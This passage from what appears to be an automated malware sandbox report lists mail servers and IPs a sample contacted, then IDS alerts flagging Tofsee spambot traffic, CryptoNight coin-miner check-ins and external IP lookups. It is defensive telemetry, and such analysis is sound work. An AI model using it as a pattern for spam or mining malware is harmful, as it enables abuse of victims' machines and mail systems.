msa-smtp-mx2.hinet.net 168.95.6.61, 168.95.6.65, 168.95.6.67, 168.95.6.66, 168.95.6.70, 168.95.6.69, 168.95.6.63, 168.95.6.64, 168.95.6.68, 168.95.6.62 unknown
verizon.net No response whitelisted
mx-aol.mail.gm0.yahoodns.net 98.136.96.73, 98.137.157.43, 66.218.85.151, 74.6.141.40, 98.136.101.116, 67.195.228.87 unknown
smile.kodakgallery.com No response unknown
nn.gx.cninfo.net No response unknown
minimarket.net No response unknown
vandsted.dk No response unknown
alt1.gmail-smtp-in.l.google.com 108.177.14.27 whitelisted
mx2.hotmail.com 65.55.92.184, 104.44.194.237, 104.44.194.236, 104.44.194.235, 104.44.194.234, 104.44.194.233, 104.44.194.232, 104.44.194.231, 65.55.37.104, 207.46.8.199, 65.55.33.135, 65.54.188.72, 65.54.188.94, 65.55.37.88, 65.55.92.136, 65.55.92.152, 65.55.37.120 unknown
mx.tdcwebmore.dk 80.160.88.34 unknown
api.pr-cy.ru 93.171.200.64 unknown
consultorcuidemais.com.br 191.252.119.205 unknown
mail.segeca.com 217.171.23.169 unknown
segeca.com No response unknown
d.imap.itd.umich.edu No response unknown
ms3.hinet.net No response unknown
msx-smtp-mx1.hinet.net 168.95.5.112, 168.95.5.120, 168.95.5.113, 168.95.5.115, 168.95.5.117, 168.95.5.111, 168.95.5.118, 168.95.5.114, 168.95.5.119, 168.95.5.116 unknown
warnerbros.com No response whitelisted
mxa-00241f01.gslb.pphosted.com 148.163.149.49 unknown
apc.olc.protection.outlook.com 104.47.125.33, 104.47.126.33 unknown
live.com.au No response unknown
hal-3.inet.it No response unknown
my.ispsystem.com No response unknown
morezen.com.au No response unknown
ms9.hinet.net No response unknown
galactica.it No response unknown
smtp.sina.com 202.108.6.242 shared
morezest.com No response unknown
alma03.cineca.it No response unknown
mailserver.morezest.com 159.253.214.239 unknown
ms33.hinet.net No response unknown
mx3.hotmail.com 104.44.194.234, 104.44.194.233, 104.44.194.232, 104.44.194.231, 65.54.188.94, 65.55.92.152, 65.55.37.72, 207.46.8.199, 65.54.188.72, 65.55.92.136, 65.54.188.110, 65.55.37.104, 65.55.92.168, 65.55.37.120, 104.44.194.237, 104.44.194.236, 104.44.194.235 unknown
consultoriass.es 82.98.137.34 unknown
www.consultoriass.es 82.98.137.34 unknown
morfacts.com No response unknown
mailwash14.pair.com 66.39.2.14 unknown
gallinatto.it No response unknown
mx.gallinatto.it 62.149.128.151, 62.149.128.160, 62.149.128.72, 62.149.128.74, 62.149.128.163, 62.149.128.157, 62.149.128.166, 62.149.128.154 unknown
ms66.hinet.net No response unknown
smtp.racine.ra.it 195.62.167.22 unknown
mail.provincia.ra.it No response unknown
iol.it No response malicious
smtp-in.iol.it 213.209.1.129 unknown
smtp-in.libero.it 213.209.1.129 unknown
libero.it No response whitelisted
morf.dk No response unknown
ASPMX.L.GOOGLE.COM 64.233.167.26 whitelisted
smtp.sina.cn 202.108.5.186 shared
eur.olc.protection.outlook.com 104.47.13.33, 104.47.12.33 whitelisted
live.fr No response unknown
inwind.it No response unknown
smtp-in.inwind.it 213.209.1.129 unknown
mfs.com No response unknown
mxb-0013d502.gslb.pphosted.com 148.163.153.189 unknown
ms25.hinet.net No response unknown
caltanet.it No response unknown
smtp-in.panservice.it 212.66.96.12, 212.66.96.18, 212.66.96.25 unknown
wru.vn No response unknown
mfscpa.org No response unknown
mx.liberto.it 62.149.128.163, 62.149.128.166, 62.149.128.151, 62.149.128.154, 62.149.128.74, 62.149.128.157, 62.149.128.72, 62.149.128.160 unknown
liberto.it No response unknown
mfscpa.org.1.0001.arsmtp.com 69.25.26.166 unknown
spamvorn.internet.is 193.4.194.72, 213.176.128.23, 193.4.194.71 unknown
popptivi.is No response unknown
outlook-com.olc.protection.outlook.com 104.47.2.33, 104.47.1.33 unknown
outlook.com No response whitelisted
mfsearch.com No response unknown
mail.mfsearch.com 209.40.196.104 unknown
tin.it No response unknown
smtp.tin.it 62.211.72.32 shared
correo2.porta.net 65.74.168.215 unknown
porta.net No response unknown

Threats

PID Process Class Message
2640 svchost.exe A Network Trojan was detected MALWARE [PTsecurity] Tofsee.bot
2164 svchost.exe Potential Corporate Privacy Violation ET POLICY Cryptocurrency Miner Checkin
2164 svchost.exe Misc activity MINER [PTsecurity] Riskware/CoinMiner JSON_RPC Response
2164 svchost.exe Misc activity MINER [PTsecurity] Risktool.W32.coinminer!c
2164 svchost.exe Misc activity MINER [PTsecurity] CoinMiner CryptoNight algo JSON_RPC server Response
2164 svchost.exe Misc activity MINER [PTsecurity] Riskware/CoinMiner JSON_RPC Response
2164 svchost.exe Misc activity MINER [PTsecurity] Risktool.W32.coinminer!c
2164 svchost.exe Misc activity MINER [PTsecurity] CoinMiner CryptoNight algo JSON_RPC server Response
2640 svchost.exe Potential Corporate Privacy Violation ET POLICY External IP Lookup - checkip.dyndns.org
2640 svchost.exe Potentially Bad Traffic ET POLICY DynDNS CheckIp External IP Address Server Response
2640 svchost.exe Potential Corporate Privacy Violation ET POLICY Possible External IP Lookup ipinfo.io
2640 svchost.exe Potential Corporate Privacy Violation ET POLICY Possible External IP Lookup ipinfo.io
2640 svchost.exe Potential Corporate Privacy Violation ET POLICY Possible External IP Lookup ipinfo.io

6 ETPRO signatures available at the full report

Debug output strings

No debug info.